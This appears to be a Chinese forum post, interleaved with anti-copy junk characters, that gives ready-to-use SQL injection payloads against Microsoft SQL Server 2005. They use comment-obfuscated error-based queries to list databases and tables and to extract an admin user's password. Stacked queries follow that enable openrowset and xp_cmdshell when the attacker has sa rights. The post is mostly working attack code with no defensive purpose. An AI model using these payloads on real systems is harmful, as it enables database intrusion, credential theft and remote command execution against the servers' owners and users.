8 ?$ K7 H* o3 c; L- ]" j1 ~6 w
2 i" X3 _; S) Y3 O- q$ ~ u- `! F& c2 ^4 |
[Copy to clipboard]CODE:+ ] W* y. s( b/ F. s$ A- c5 S
/**/and/**/(select/**/top/**/1/**/isnull(cast([name]/**/as/**/nvarchar(500)),char(32))%2bchar(124)/**/from/**/[master].[dbo].[sysdatabases]/**/where/**/dbid/**/in/**/(select/**/top/**/1/**/dbid/**/from/**/[master].[dbo].[sysdatabases]/**/order/**/by/**/dbid/**/desc))%3d0--+ [! \, K! b- B: {3 t8 o9 R
0 X6 G5 F% N4 N5 m O爆表语句,somedb部份是所要列的数据库,红色数字1累加% Q$ b6 z) Y0 }# W- g: h
- |( n; T, ~/ B% S k- r* m! D
$ ]: b/ P$ n$ U" j
[Copy to clipboard]CODE:1 b( S; i. A( x {, S2 C
/**/and/**/(select/**/top/**/1/**/cast(name/**/as/**/varchar(200))/**/from/**/(select/**/top/**/1/**/name/**/from/**/somedb.sys.all_objects/**/where/**/type%3dchar(85)/**/order/**/by/**/name)/**/t/**/order/**/by/**/name/**/desc)%3d0--" e' v* N$ E- |; \/ L" H
$ ~# Y+ P4 }0 e! [+ @$ [爆字段语句,爆表admin里user='icerover'的密码段" L% B* e- O8 Z9 I& a
9 E1 `9 e9 a, h$ P+ q# ?0 G' r
( i% C. Z) | t( e( ~; @8 r[Copy to clipboard]CODE: i0 V- M1 r* B, ]& B
**/And/**/(Select/**/Top/**/1/**/isNull(cast([password]/**/as/**/varchar(2000)),char(32))%2bchar(124)/**/From/**/(Select/**/Top/**/1/**/[password]/**/From/**/[somedb]..[admin]/**/Where/**/user='icerover'/**/Order/**/by/**/[password])/**/T/**/Order/**/by/**/[password]Desc)%3d0--, y% J, O. e* f a
$ r$ ?" R7 D* P: d kmssql2005默认没有开xp_cmdshell的,openrowset也不能用2 Z3 |$ h; C9 u0 [/ H/ E
如果是sa权限,可以这样来开启8 s$ B# y8 A6 p2 e% W/ h
开启openrowset
1 }3 [( e8 R+ W; N4 ?! c# @. s9 M: M C' `, G
" }9 h b3 j) U[Copy to clipboard]CODE:
1 H3 u. X: m- E- @/**/sp_configure/**/'show/**/advanced/**/options',/**/1;RECONFIGURE;--$ z X+ R# _6 a& r+ C
/**/sp_configure/**/'Ad/**/Hoc/**/Distributed/**/Queries',/**/1;RECONFIGURE;--
' |6 h: ~7 M& k) e
% v- ] U0 r$ J- l4 j5 j& Q0 a1 @开启xp_cmdshell% n2 x1 l4 ]: Y. o1 e
; {3 x3 {' p7 n& `! R% x6 T
& g, o7 D2 a* h, R9 W; S5 C- \, f
[Copy to clipboard]CODE:$ x3 B4 q" \6 ]2 ^1 I
EXEC/**/sp_configure/**/'Ad/**/Hoc/**/Distributed/**/Queries',1;RECONFIGURE;--
& O- U' {9 y) b0 a6 |0 JEXEC/**/sp_configure/**/'show/**/advanced/**/options',1;RECONFIGURE;EXEC/**/sp_configure/**/'xp_cmdshell',1;RECONFIGURE;--2 m" X/ V* c5 K4 O' p
4 i9 X) d6 q1 m/ r$ O1 bok,over~~晚安
& V# v1 E1 @+ `: ]) ~1 e% n% v |